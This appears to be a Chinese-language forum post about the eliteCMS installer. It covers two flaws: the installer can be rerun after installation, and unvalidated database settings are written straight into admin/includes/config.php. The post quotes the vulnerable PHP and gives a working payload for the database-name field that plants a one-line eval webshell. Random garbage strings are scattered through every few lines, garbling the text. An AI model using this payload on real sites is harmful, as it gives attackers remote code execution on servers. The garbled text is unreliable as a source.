eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装+ U( [; A5 \' q: {, w& T
* v/ R3 a' P/ O: _: h另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php+ r j9 Z" i. _0 O
我们来看代码:
( o9 L. D5 c2 u) b! {
% w: z+ e" ^- A7 I- G7 a..." s+ d/ v, X1 y. y. Z9 ~# L
elseif ($_GET['step'] == "4") {
( g% ~: s. u+ ^) T6 e $file = "../admin/includes/config.php";
2 j2 S+ b3 f/ F $write = "<?php\n";2 @& G$ N4 @. N: Q
$write .= "/**\n";4 d; N( |/ l5 Q7 O/ G# p9 {
$write .= "*\n";
' o* \# y- S9 c5 c $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
' \- c4 @) V$ u' ^...略...
+ ?) v& W: u7 Y# v0 K6 f( ]6 H $write .= "*\n";
% ^4 @! C$ I6 [4 _% S; e- ? $write .= "*/\n";
: Q+ }1 @: A- ]% A6 O $write .= "\n";
" z/ @/ G$ N. Y& m! L% S $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
`9 ]9 v5 i+ K/ C1 m $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' w2 t u9 ^2 [% a. p
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";# j! D% q$ k; I
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
) D! [3 e8 z- j; K1 {, m $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";. X- e, S2 S9 A" I1 q
$write .= "if (!\$connection) {\n";/ I! u3 j" ]1 F6 U0 t. {# V$ o
$write .= " die(\"Database connection failed\" .mysql_error());\n";0 z$ g% O u- \$ K. ^
$write .= " \n";4 ^; L3 n5 V# H3 C% m
$write .= "} \n";
# z/ u1 _! c; p: r $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";% K6 o$ \! u) M: ]8 U, \- V
$write .= "if (!\$db_select) {\n";
0 Y$ G1 s" \& W7 R6 r $write .= " die(\"Database select failed\" .mysql_error());\n";
* S0 C- ]7 K/ C0 \0 P* X. Z7 T $write .= " \n";' x( {$ {0 ~1 _- P# G' U# \2 x
$write .= "} \n";
' O1 p% F1 n0 u& w5 n( ~ $write .= "?>\n";
! S# A; W: w( m/ n
! k# @+ ]+ c8 Q' i3 @7 \* O $writer = fopen($file, 'w');8 T/ l$ s* }, \6 N0 u2 l
...6 @8 X% q9 d5 ?( C
. m. j9 J& q3 j
在看代码:
* t3 ^! b6 a) D0 @& V3 ^ 7 V# u/ r C( T$ M+ \
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];6 n4 D' ^+ Y: I, k, ` e
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
4 O6 y A4 [; v" y6 v( E7 ^$_SESSION['DB_USER'] = $_POST['DB_USER'];
0 c0 h' Y! Q- c5 {, a6 ?5 G3 z! f$_SESSION['DB_PASS'] = $_POST['DB_PASS'];1 W8 l& D- X+ F. U& j
$ Z2 x, w! K4 v7 P* i& c) M: K: u取值未作任何验证
: e( ^- {! ^ j% z) @" M/ J如果将数据库名POST数据:
& D5 \0 V6 b: ]0 T . \9 T+ L0 B( _% B8 a' |- ?
"?><?php eval($_POST[c]);?><?php% \9 u4 x7 `$ g) |( L, p
3 Z5 v; X$ P( y {
将导致一句话后门写入/admin/includes/config.php
7 b# A( l! ?% d! C. a6 i8 b |